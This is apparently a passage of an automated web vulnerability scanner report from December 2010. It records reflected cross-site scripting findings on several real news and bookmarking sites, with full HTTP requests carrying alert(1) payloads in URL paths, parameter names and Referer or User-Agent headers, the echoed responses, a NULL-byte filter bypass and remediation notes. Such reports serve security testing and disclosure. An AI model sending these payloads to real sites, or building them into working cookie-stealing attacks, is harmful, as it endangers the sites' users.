<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/newsa1b60"><script>alert(1)</script>31a60ca3d79/infrastruc;kvarticleid=;kvauthor=;loc=300;grp=779367181" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12c04'-alert(1)-'6b0a2437397 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/infrastructure12c04'-alert(1)-'6b0a2437397/ethernet/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 13 Dec 2010 03:23:38 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Mon, 13 Dec 2010 03:23:38 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=SF3ERL5Q5RXN5QE1GHOSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32166
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/infrastructure12c04'-alert(1)-'6b0a2437397/ethernet/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=625889978;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b9e9"><img%20src%3da%20onerror%3dalert(1)>7b0b85e0d74 was submitted in the REST URL parameter 2. This input was echoed as 6b9e9"><img src=a onerror=alert(1)>7b0b85e0d74 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /news/infrastructure6b9e9"><img%20src%3da%20onerror%3dalert(1)>7b0b85e0d74/ethernet/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 13 Dec 2010 03:23:37 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Mon, 13 Dec 2010 03:23:37 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=HMLO04V5LQ0EBQE1GHOSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32244
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <IMG height=1 width=1 SRC="http://view.atdmt.com/action/MSFT_TechWeb_AE_ExtData/v3/atc1.informationweek/atc2.infrastructure6b9e9"><img src=a onerror=alert(1)>7b0b85e0d74/atc3./"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab167"><a%20b%3dc>a759730c53e was submitted in the REST URL parameter 3. This input was echoed as ab167"><a b=c>a759730c53e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/infrastructure/ethernetab167"><a%20b%3dc>a759730c53e/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 13 Dec 2010 03:23:45 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Mon, 13 Dec 2010 03:23:45 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=NVXA05MPZPF4JQE1GHPSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32152
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/infrastructure/ethernetab167"><a b=c>a759730c53e/show;kvarticleid=;kvauthor=;loc=300;grp=353457811" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20bc0'-alert(1)-'7b1c3c162b8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/infrastructure/ethernet20bc0'-alert(1)-'7b1c3c162b8/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 13 Dec 2010 03:23:50 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Mon, 13 Dec 2010 03:23:50 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=T4253BWY0VAMDQE1GHPCKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32138
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/infrastructure/ethernet20bc0'-alert(1)-'7b1c3c162b8/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=579697826;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c1df'-alert(1)-'02f2b0491cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/202561/mobile_spending_to_pass_wired_broadband_by_2015.html8c1df'-alert(1)-'02f2b0491cd HTTP/1.1 Host: www.pcworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=E12EC249E829AB095F91C860CD3DF86F; Path=/ Content-Type: text/html;charset=UTF-8 Date: Mon, 13 Dec 2010 03:25:39 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" ...[SNIP]...
Logon.isValid = '' != Logon.userEmail;
/* Namespace RememberURI */ var RememberURI = new Object(); RememberURI.referer = '/article/202561/mobile_spending_to_pass_wired_broadband_by_2015.html8c1df'-alert(1)-'02f2b0491cd'; if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) { RememberURI.query = ''; RememberURI.referer += RememberURI.query; document.cookie = "pcw.last_uri=" ...[SNIP]...
1.62. http://www.prepaid-press.com/news_detail.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prepaid-press.com
Path:
/news_detail.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8780"-alert(1)-"addb476b639 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news_detail.php?f8780"-alert(1)-"addb476b639=1 HTTP/1.1 Host: www.prepaid-press.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:26:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.2 X-Powered-By: PHP/5.3.2 Connection: close Content-Type: text/html Content-Length: 15527
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>The Prepaid Press</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="esti ...[SNIP]... <script type="text/javascript">a2a_linkname=document.title;a2a_linkurl="http://www.prepaid-press.com/news_detail.php?f8780"-alert(1)-"addb476b639=1";</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34526"><script>alert(1)</script>1eb359dd18e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content34526"><script>alert(1)</script>1eb359dd18e/fasttakes-china-unicom-ericsson-ntt-docomo-singtel-microsoft HTTP/1.1 Host: www.telecomasia.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 13 Dec 2010 03:29:59 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.13 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: SESSe2542690d25c7f58c482113760c6bb03=esvqalc4r35ogu9mppklrd5sr1; expires=Wed, 05-Jan-2011 07:03:19 GMT; path=/; domain=.telecomasia.net Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 13 Dec 2010 03:29:59 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26794
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head profile="http:// ...[SNIP]... <a href="http://www.telecomasia.net/content34526"><script>alert(1)</script>1eb359dd18e/fasttakes-china-unicom-ericsson-ntt-docomo-singtel-microsoft" > ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39ef0"><script>alert(1)</script>aeab5dc120e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content39ef0"><script>alert(1)</script>aeab5dc120e/fasttakes-kt-ericsson-vodafone-wikileaks HTTP/1.1 Host: www.telecomasia.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 13 Dec 2010 03:29:59 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.13 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: SESSe2542690d25c7f58c482113760c6bb03=duribv5qr4omblp9s20vml5410; expires=Wed, 05-Jan-2011 07:03:19 GMT; path=/; domain=.telecomasia.net Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 13 Dec 2010 03:29:59 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26714
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head profile="http:// ...[SNIP]... <a href="http://www.telecomasia.net/content39ef0"><script>alert(1)</script>aeab5dc120e/fasttakes-kt-ericsson-vodafone-wikileaks" > ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1e29"><script>alert(1)</script>aa0a7405dce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contentf1e29"><script>alert(1)</script>aa0a7405dce/japans-4g-ramp-drive-industry-growth HTTP/1.1 Host: www.telecomasia.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 13 Dec 2010 03:30:00 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.13 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: SESSe2542690d25c7f58c482113760c6bb03=53ukiltcr6cvuesor6266321c5; expires=Wed, 05-Jan-2011 07:03:20 GMT; path=/; domain=.telecomasia.net Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 13 Dec 2010 03:30:00 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26698
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head profile="http:// ...[SNIP]... <a href="http://www.telecomasia.net/contentf1e29"><script>alert(1)</script>aa0a7405dce/japans-4g-ramp-drive-industry-growth" > ...[SNIP]...
1.66. http://www.von.com/news/2010/08/mobile-data-crunch-spurs-billing-dilemma.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e8e4"%3balert(1)//a9d9f2e652b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1e8e4";alert(1)//a9d9f2e652b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/2010/08/mobile-data-crunch-spurs-billing-dilemma.aspx?1e8e4"%3balert(1)//a9d9f2e652b=1 HTTP/1.1 Host: www.von.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><meta http-equiv="X ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.pageName="/news/2010/08/mobile-data-crunch-spurs-billing-dilemma.aspx?1e8e4";alert(1)//a9d9f2e652b=1"; //document.title s.server="" s.channel="" s.pageType="" s.prop1="" s.prop2="" s.prop3="" s.prop4="" s.prop5="" /* E-commerce Variables */ s.campaign="" s.state="" s.zip="" s.events="" ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ad375"><a>73332b4105 was submitted in the Referer HTTP header. This input was echoed as ad375"><a>73332b4105 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /p/news-articles/wireless-news/mi_hb5558/is_20100531/pyramid-prepaid-mobile-broadband-common/ai_n53830932/ HTTP/1.1 Host: findarticles.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: %00ad375"><a>73332b4105
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8df4d"><a>78a58864522 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /p/news-articles/wireless-news/mi_hb5558/is_20100706/pyramid-research-players-push-quad/ai_n54327540/ HTTP/1.1 Host: findarticles.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: 8df4d"><a>78a58864522
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f627d"><a>0e95866a29f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /p/news-articles/wireless-news/mi_hb5558/is_20100721/pyramid-research-taiwan-operators-focus/ai_n54504589/ HTTP/1.1 Host: findarticles.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: f627d"><a>0e95866a29f
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60959"><script>alert(1)</script>17effffa176 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /news/banking/Updated_regulations_necessary_to_catalyze_mobile_banking,_says_study1 HTTP/1.1 Host: member.bnamericas.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=60959"><script>alert(1)</script>17effffa176
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d95e3"><script>alert(1)</script>b70c0eb3229 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /news/banking/Updated_regulations_necessary_to_catalyze_mobile_banking,_says_study1 HTTP/1.1 Host: member.bnamericas.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d95e3"><script>alert(1)</script>b70c0eb3229 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcb18"><script>alert(1)</script>f8ffc730b44 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /news/telecommunications/FEATURE:_Mobile_TV_misses_the_boat_for_South_Africa,_but_apps_and_LCDs_jump_on_board HTTP/1.1 Host: member.bnamericas.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=fcb18"><script>alert(1)</script>f8ffc730b44
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9548"><script>alert(1)</script>c61da699167 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /news/telecommunications/FEATURE:_Mobile_TV_misses_the_boat_for_South_Africa,_but_apps_and_LCDs_jump_on_board HTTP/1.1 Host: member.bnamericas.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c9548"><script>alert(1)</script>c61da699167 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d35bb"><script>alert(1)</script>96810b01ed8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=d35bb"><script>alert(1)</script>96810b01ed8
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:17:40 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 92202
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=d35bb"><script>alert(1)</script>96810b01ed8" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 44360<script>alert(1)</script>65a4ba6ef40 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=44360<script>alert(1)</script>65a4ba6ef40
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:17:41 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 92188
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>44360<script>alert(1)</script>65a4ba6ef40 - Google search</h4> ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8024"-alert(1)-"426e85a8bf2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /feed/showArticle.jhtml HTTP/1.1 Host: www.financetech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f8024"-alert(1)-"426e85a8bf2 Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Mon, 13 Dec 2010 03:22:34 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Mon, 13 Dec 2010 03:22:34 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=BMOMAGMLJKQXZQE1GHPCKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 23295
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a45c"-alert(1)-"52d89e7f6ea was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
